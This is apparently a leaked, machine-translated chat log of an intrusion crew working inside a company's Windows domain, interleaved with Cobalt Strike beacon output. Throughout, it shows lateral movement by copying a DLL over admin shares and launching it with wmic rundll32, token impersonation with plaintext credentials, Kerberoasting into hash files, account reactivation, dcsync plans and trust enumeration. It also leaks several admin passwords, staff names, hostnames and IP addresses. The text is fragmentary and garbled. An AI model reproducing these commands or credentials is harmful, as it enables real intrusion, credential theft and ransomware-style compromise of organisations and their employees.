``from where did you ping the process? what? if you want access from the current domain - write the login I'll look at the server from where the session came as you leave the session kill) well, from those trusts that have pinged already got hell infokonitely, or do you think that there already is all hell is redone?) now you pass and you will be distributed to different servers just sorted YES from c360.local and sorted common from saig.frd.global
and then the session fell off (-if the dll doesn't delete it, it's better to do it via dlld, sposk servers from AD, and where there are no / few DA processes+ who fell off can get back into the network via the peersSelect different servers and there away from the peers perform their tasks now should be+ -in a couple minutes will be anyone besides @user3 get into a different domain?who has a session fell off - that's the noise)distribute on different servers@user1 gave a session from another placeI still alive)not at the same time but still in turn normally at the same time? noise in general in terms of noise is normal that we all trusts were started with one machine? shut down the server) ``
[+] received output:

Pinging 10.195.115.49 with 32 bytes of data:
Request timed out.

Ping statistics for 10.195.115.49:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

If you're talking about all the actions, then a couple of other accounts have been blocked) all the noise and kerb and adnashumeli? 32m respond in terms of dead@tl1
sessions fell off2 pass between identical users in two domains can be identical1 you deduct EA and YES from two domains and look for collisions here's what you're confusing me thought it was 20+ October I got confused in months of course ok) and the stoppass from 2027 changed what ok?
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM
Password required Yes
User may change password Yes

``Why? net user to check withmb_login? 1) the password to the account fits? or it changed? it seemed or why there is a pass in the domain I have not very good vision``
beacon> portscan 10.225.10.201 445
[*] Tasked beacon to scan ports 445 on 10.225.10.201.
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.225.10.201' is alive. [read 8 bytes]

[+] received output:
10.225.10.201:445 (platform: 500 version: 10.0 name: USHDC1-CSPADS02 domain: DATACENTER)
Scanner module is complete

``Just like this, I added him to the targets on the datacenter will I get a jump like this? with the one you gave him found a man matching I downloaded from datacenter.lokal ad_userssmarid?went ping on the host Team Lead 1@tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1@tl1@tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1 @tl1@tl1@tl1
@tl1@tl1
@tl1@tl1 not to copy anything directly therewhat's the best way to get a session on the pdk so you don't lock the account? have you done it under a token?
trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
```
I don't like his treat-external, is the domain big? ```
dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-00:05:33 Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]
``either there will be something else there at least 6 people per comptroller so either there will be 0 and nothing found - 136
users 828
groups - 98 it does not record gradually and at all, as I remember, adfind writes to the file as soon as the stream ends and YES 500, most likely there is not enough) if the pc 5 how many users, groups, pc, and so tdu @user8 one pc, router and bucket..xD That's what I wanted to hear, thank you, God bless all the good things depending on the purpose of the domainwhere 200+where it could be 2000+ pktut not that each domain is the size of all the others) I, how should I say it ... not too early to stick it out? the guys there are 10+ meters less than a megabyte file me in the data center ad_computer to 136 comps only a question when the session will be in another domain, then you can learn LA on pdc@tl1
what command can you send a request for the withdrawal of admins to the PDK?
YES, EA ok from ad_users are pulled, but LA with what can be pulled?
shell copy npCIDetect.dll \10.195.23.1\C$\ProgramData
shell wmic /node:10.195.23.1 process call create "rundll32 C:\ProgramData\npCIDetect.dll entryPoint"
how did it get there ?@tl1 I'm walking around in the first posts @tl1 from hell what to get ? or all ?.if they are identical, then in the future you can choose any of the options try -h 1 category remove and compare results if it goes well first try through -b do not know this key)and no copying files and loqs do you have guides on adfind.exe ? how do you do it? great)@user3 where did you go?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=yciY2CdqLzmMKvmpx) and how do you implement trust in this scheme? fill and run the adfind batnick before you fucking block the account again who the fuck else calm down man
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

beacon> shell copy x64.dll \10.225.10.201\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\10.225.10.201\\C$\windows\Temp\
[+] host called home, sent: 76 bytes
[+] received output:
Access is denied.
        0 file(s) copied.

``My question again I ask you how do you remove adlocate an account in another domain where there is no access already unblocked accts should already have ceased to work with trustsbut did not notice) ahahahahaht to you already in this domain)))))) and inmikpotentially allowed to copylegalco.global how come) the current domain trusts the current domain) saig.frd.global ``
beacon> psinject 760 x64 Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8
[*] Tasked beacon to psinject: Invoke-Kerberoast -outputformat hashcat | fl | out-file -filepath C:\Windows\Temp\Eula.txt -append -force -encoding UTF8 into 760 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
Failed to create the runtime host
``what is the current domain?
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
[+] host called home, sent: 53 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell copy x64.dll \10.212.8.247\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\\10.212.8.247\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.
beacon> shell wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8036;
	ReturnValue = 0;
};


``what was the command? and what was the token? yes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=NwFq9MYq8oLEpnLpj) on the pdc from the trusts?
beacon> shell copy x64.dll \datacenter.local\C$\windows\Temp\
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 79 bytes
[+] received output:
The system cannot find the file specified.
        0 file(s) copied.


beacon> shell copy C:\ProgramData\x64.dll \\\datacenter.local\C$\\windows\Temp\
[*] Tasked beacon to run: copy C:\ProgramData\x64.dll \\datacenter.local\C$\windows\Temp\
[+] host called home, sent: 94 bytes
[+] received output:
The system cannot find the file specified.
        0 file(s) copied.

deleted the files made a token, copied the dlc there, ran
i took the token from the trusts, so all together not to sit on the same one did you take the token off? no questions followed, so it was clear to everyone the principle of trust i explained above or did you make the token? did someone copy something somewhere? to remove the kerbs from the trusts now also unlock the token an important object i unlocked the token how to unlock the token?
beacon> make_token saig.frd.global\sqladmin u5t3r
[*] Tasked beacon to create a token for saig.frd.global\sqladmin
[+] host called home, sent: 48 bytes
[+] Impersonated NT AUTHORITY\SYSTEM


beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes


beacon> shell copy x64.dll \\datacenter.local\C$\windows
[*] Tasked beacon to run: copy x64.dll \\\datacenter.local\C$\windows
[+] host called home, sent: 73 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.

``made a token on it
copy the dhelka to datacenter.local
this is a mistake how can i lock the account here tell me what you do))
User name sqladmin
Full Name SQL Admin
Comment SQL Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 9/08/2007 11:31:52 AM
Password expires Never
Password changeable 10/08/2007 11:31:52 AM
Password required Yes
User may change password Yes
```
```
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied
``````
Liverpool1! /user:saig.frd.global\adm.yorgar0
``This is valid creeds yes[ ](https://mediaeveryone.com/group/saiglobal-com?msg=4MhjNGRXYY52KgfTf) under this token can I do? let's you discuss the issues between you first) yes everything is? so, and the AD how to shoot if the files do not copy?
chs@1944! /user:saig.frd.global\adm.soucam1
I actually unhooked it with this error after the error[ ](https://mediaeveryone.com/group/saiglobal-com?msg=x24ZPHvo9Aa7oJnww) did you exactly unhook it without the token?
datacenter.local [10.225.10.201] - removed the kerb under the token
ad-apse2.build.aws.saig - not pinged
ad-usea1.prd.aws.saig - not pinged
c360uk.local - not pinged
``also not taken off``
now it's hanging on this
```
beacon> psinject 440 x64 Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast Invoke-Kerberoast -OutputFormat HashCat -Domain legalco.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes

``Are all the aces normal? c360.local
SaigProd.local
standards.com.au
kerbs are not removed from them from any context currently available domains, remove hell infoSo the second removed kerbs, with the rest what?
```
ad-apse2.np.aws.saig - not pinging
saig.frd.global - 10.212.8.247
ad-euce1.prd.aws.saig - not pinging
usea1.np.aws.saig - dns not available, but it is not quarantined in ad_comp
```.```
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:34:03> shell net user CATOR-SQLSA /dom
[*] Tasked beacon to run: net user CATOR-SQLSA /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain saig.frd.global.

User name CATOR-SQLSA
Full Name CATOR-SQLSA
Comment Assurance BAT Service Account
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 23/11/2008 3:05:24 AM
Password expires Never
Password changeable 24/11/2008 3:05:24 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/10/2020 1:15:02 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *SG-Global-Azure-SAIGL*Domain Users
The command completed successfully.

``Check all the accounts under which you did the tokens.The point is that if you do under the token, the account in the lock will fly))))) ``The user name or password is incorrect.`` What are you talking about? So what, he has the same credentials does not matcha so everyone supported his answer because the rest did not respond to anything means @user7 said on behalf of the team)ya molchal)))[ ](https://mediaeveryonecom/group/saiglobal-com?msg=35JCRwHAQDSmz9Egw) 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=GDd8wXHsW6roifBW4) 1schat all lock...-so you removed them because miktoken? how the pig will understand that we will address different?
datacenter.local
``````
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
``````
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | how to understand``
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
```
```
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``And you take the kerb on the trastk it is not in the quarantine how can you remove the kerb there at all?) if it is a quarantined domain.
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local |` fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
``as already taken down in theirsnimi kerbs in this domain from system execute[ ](https://mediaeveryone.com/group/saiglobal-com?msg=hzcJhm5tky72ecxNW) from YES?
or to what? ``Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl'' try to execute it from your@user9 have you had these errors?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Wif3ijHzbeWo7syeq) from current don``t
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execption for details."
ERROR:
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR:
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR:
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<< ()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: + FullyQualifiedErrorId : InvokeMethodOnNull
ERROR:


Didn't you take it out after make_token?
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:18:22> psinject 2132 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl into 2132 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/asnet2000.standards.com.au:1433' from user 'CN=geronimo,OU=Users Pre-MOE,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05677XPD.standards.com.au:1433' from user 'CN=Sam Allen,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05591XPN.standards.com.au:1433' from user 'CN=Raymond Yuen,OU=Users-Disabled,OU=Users,OU=SAI-Global - objects NOT to be migrated,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05556WD.standards.com.au:1433' from user 'CN=Aaron Flew,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI-Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/SYDIIS.standards.com.au:1700' from user 'CN=SSQLrvService,OU=Service Accounts,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."

```
What's wrong? Check the file?
[*] Tasked beacon to psinject: invoke-kerberoast -domain datacenter.local -outputformat hashcat | fl | out-file -filepath c:\ProgramData\datacenterlocalhash.txt -append -force -encoding UTF8 into 840 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/C360SQL3:56162' from user 'CN=usatlhc-sql,CN=Users,DC=datacenter,DC=local' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."

``a, not in hashtag format)))))))
i'm going to redo it now try to remove the kerb trustabes token usernet have you taken the kerbs off and done nothing yet? if he had been blocked in front of him, most likely in 3 hours you would have lost all sessions already````
Lockout threshold: 10

``He's not the last administrator, by the way.
Local Group Memberships *Backup Operators *Epicor Admins
Global Group memberships *Exchange Admins *SAIG Corporate IT Dat
                             *SG-Global-FTP-Adminis*APAC Websense Web Sec
                             *SG-EMEA-Citrix-Admin *APAC SAN Admin
                             *SL-SAIG-EU CS vCenter*SG-AS-Citrix-AdminApp
                             *SG-Americas-Storage-A*ucsadmin
                             *APAC Citrix Admin Acc*SG-Global-TEN-Admin
                             *SG-Okta-MFA Yubikey *SAIG Corporate IT SCC
                             *SG-Global-Actifio-Adm*SG-Global-Azure-SAIGL
                             *SG-APAC-Citrix-Admin *SG-Okta-Salesforce-Co
                             *APAC MOM Authors *APAC Storage Admins
                             *APAC Actifio Admins *SG-APAC-Horizon-RDP
                             *SG-Okta-MFA SMS *SG-Okta-Admin Super A
                             *SG-Global-FPS-Adminis* SG-Okta-Salesforce-SL
                             *SAIG Corporate IT Tre*SAIG Corporate IT SCC
                             *Desktop Admins *Group Policy Creator
                             *SAIG SMS Administrato*VCO_Admins
                             *SG-Okta-Fortinet *SG-GLOBAL-EMS-ADMIN
                             *SG-AMER-SAN-PureAdmin*SG-Okta-MFA Okta Veri
                             *Domain Admins *APAC vCenter Admin
                             *SAIG SMS Users *SG-GLOBAL-vCenter Adm.
                             *Domain Users *SG-Okta-SandboxAccess
                             *SG-GLOBAL-Horizon-Adm*SG-AMER-HorizonPOC1-U
                             *APAC SAN Users *SG-Americas-Citrix-Ad
                             *Exchange Full Admins *SAIG SMS RemoteResolv
                             *sg-aws-adfs-opsprod-c*SG-APAC-Citrix-RDP
                             *Americas Actifio Admi*SG-Citrix-TerminalSVC
                             *SG-Global-OKTA-Users *Firewall Admins
                             *SG-Corp-IT-Americas *SG-Okta-Jamf Pro
                             *SQL Admins *SPS Administrators
                             *SG-AMER-VCENTER-Admin *SG-IT-Americas
``How many attempts do you need to see the password block policy?
beacon> shell net user adm.kinzac0 /domain /active:yes
[*] Tasked beacon to run: net user adm.kinzac0 /domain /active:yes
[+] host called home, sent: 71 bytes
[+] received output:
The command completed successfully.


beacon> shell net user adm.kinzac0 /dom
[*] Tasked beacon to run: net user adm.kinzac0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name adm.kinzac0
Full Name Admin - Zach King
Comment Zach King Administrator Account
User's comment
Country/region code (null)
Account active Yes
Account expires Never

``Hasn't his password been changed? If it was taken in the 20s
```
adm.fraste1
Password last set 23/09/2020 12:59:10 PM
Password expires 7/12/2020 12:59:10 PM
Password changeable 24/09/2020 12:59:10 PM

``CATOR-SQLSA
Americadpm
sqladminchecking yes for validitydid you do? not just usually a sample of 3You have more passwords are you on dcsync? if we do not have a new password dcsync? yes user loginname /DOMAIN /active:YES ?when it hits the joint 1 day before expires and postlet to info may not be relevant literally the next day[ ](https://mediaeveryone.com/group/saiglobal-com?msg=uj7Y469YPjWWeRJXu) of course it's better to check accessesyou have such a possibility and preferably quicklyerasblock his token with invalid password and blocked him)info was taken in 20 dayshe had his password changed on the 27th
Password last set 27/09/2020 4:07:48 AM
Password expires 11/12/2020 4:07:48 AM
Password changeable 28/09/2020 4:07:48 AM

``So maybe the rest of the YES should be checked? and who was blocked? what were the last 5 teams? no, so we didn't even have time to do anything(lying?:face_with_monocle:that was it((already blocked?
```
The referenced account is currently locked out and may not be logged on to.

``````
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:44:38> shell ping c360.local -n 1
[*] Tasked beacon to run: ping c360.local -n 1
[+] host called home, sent: 51 bytes
[+] received output:

Pinging c360.local [10.195.43.2] with 32 bytes of data:
Reply from 10.195.43.2: bytes=32 time<1ms TTL=127

Ping statistics for 10.195.43.2:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```
```
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 16:43:18> shell ping SaigProd.local -n 1
[*] Tasked beacon to run: ping SaigProd.local -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging SaigProd.local [10.195.100.1] with 32 bytes of data:
Reply from 10.195.100.1: bytes=32 time<1ms TTL=127

Ping statistics for 10.195.100.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
``[ ](https://mediaeveryone.com/group/saiglobal-com?msg=rtmTXhZPPjifbRMpn) please send me the current server dns and quarantines quarantined so portscan to 445 port at this address, all trusts were pinged, even 2 quarantined ones or replica on ping is disabled[ ](https://mediaeveryone.com/group/saiglobal-com?msg=WH9sEZfcrAfXdBwMQ) when you get this result, most probably from your entry point where you are in session now, traffic is not allowed. Most probably WSUS server needs to look for servers with quarantined domain in DNS so no ping, I think it is understandable here `` ``.
Ping request could not find host Anstat.local. Please check the name and try again.
```
it is like he does not see it because the domain is quarantined and DNS within this domain is not available to our domain@user3 and all others[ ](https://mediaeveryone.com/group/saiglobal-com?msg=oYJ3E9eGQJ3TH2hgL) dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/02-22:18:37 Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]``.
beacon> run ping ad-apse2.prd.aws.saig
[*] Tasked beacon to run: ping ad-apse2.prd.aws.saig
[+] host called home, sent: 44 bytes
[+] received output:

Pinging ad-apse2.prd.aws.saig [10.10.149.148] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.
Request timed out.

Ping statistics for 10.10.149.148:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

``3/4 100% loss''.

Pinging ad-apse2.np.aws.saig [10.10.4.166] with 32 bytes of data:
Request timed out.

Ping statistics for 10.10.4.166:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``````
beacon> run ping Anstat.local
[*] Tasked beacon to run: ping Anstat.local
[+] host called home, sent: 35 bytes
[+] received output:
Ping request could not find host Anstat.local. Please check the name and try again.

If it's not pinging, do you go further down the list? And another thing, since the report will be an archive, next to the ad_*.txt file, make a file creds.txt where
DCs
DA
EA
LA and if you run the command 5 times net use in another domain without reading the error as you like, then you can say that about 50% of the admins that something will suspect) and more, crud YES in the other domains can block your account as you understand the beginning ping all domains and see if they respond quarantined more difficult because you can not get out of there any information, you can check the availability of DNS from a quarantined domain but in this case, dsync THROUGH trust will be very noisyIn such a relationship, you can use trust to pull kerbs, pull the AD, in my @user8 dcsync by trust, just saw @user7 take two quarantined domains))) with quarantined domains is more complicated)
dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-00:34:59 Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``````
dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
````trustDirection ``trustAttributes`` Did you read what to look for?
trusts can't have all pdk's, right?
```
trusts:
datacenter.local
ad-apse2.build.aws.saig
ad-usea1.prd.aws.saig
c360uk.local
```
```
EA:
saig.frd.global\CATOR-SQLSA T3rm1nal
``anyone read the trusts file?
dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
```
my
`saig.frd.global\tresvc0 3nterprisE````
saig.frd.global\adm.kinzac0 dr3Amth3At3r
```

```
dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global
dn:CN=saig.frd.global,CN=System,DC=frd,DC=global
dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global
dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global

``````
saig.frd.global\tresvc0 3nterprisE
>name: datacenter.local
>name: legalco.local
>name: anstat.local
>name: ad-apse2.prd.aws.saig
``So if we find these, they are written in a separate groupwhy I wrote about the allocation of backup servers, you should relate to the scan, it often happens that the backup server is outside the domain, they are somewhere in the workgroup nearby and as you have understood, the report will be the archive in which
1) YES, hell info, EA, LA on MAC, hashes of all users
2) Sort all PCs in the domain
3) Which EDR and where it is administered (admin with valid accesses)
4) In each trust session (or specifying the links from where to where and how to get in)
6) Separate group of backup servers, separate user's PCs
Repeat items above for each domain to 3 hours can handle it (260 machines per brotam will report if manuals, then by hand) 1300 servers in one domain this time I think right away by hand, on Saturday almost an hour with the script struggled, in the end pinged for 5 minutes, what did loomisco disassemble the network What is the task? again pinged decided yes? hopefully this time faster) ad_comp > win serv > ping > portscan /24
?```

      IDJAK-COPFP01.saig.frd.global [DS] Site: IDKBU1
     UKMK1-COPADS01.saig.frd.global [DS] Site: UKMIK1
    USALP1-COPADS01.saig.frd.global [DS] Site: USALP1
    USWAL1-COPADS01.saig.frd.global [DS] Site: USWAT1
        CNPEKJV-DC1.saig.frd.global [DS] Site: CNCHD1
    AUMEL1-COPADS02.saig.frd.global [DS] Site: AUMEL1
    THPAT1-COPADS02.saig.frd.global [DS] Site: THPAT1
    AUBNE1-COPADS01.saig.frd.global [DS] Site: AUBNE1
    AUOSB1-COPADS01.saig.frd.global [DS] Site: AUOSB1
    AUPME1-COPADS02.saig.frd.global [DS] Site: AUPME1
    JPTOK1-COPADS01.saig.frd.global [DS] Site: JPTOK1
    UKHDC1-COPADS01.saig.frd.global [DS] Site: UKHDC1
    UKHDC1-COPADS02.saig.frd.global [DS] Site: UKHDC1
    CATOR1-COPADS01.saig.frd.global [DS] Site: CATOR1
    auhdc1-copads01.saig.frd.global [PDC] [DS] Site: AUHDC1
    AUSYD1-COPADS01.saig.frd.global [DS] Site: AUSYD1
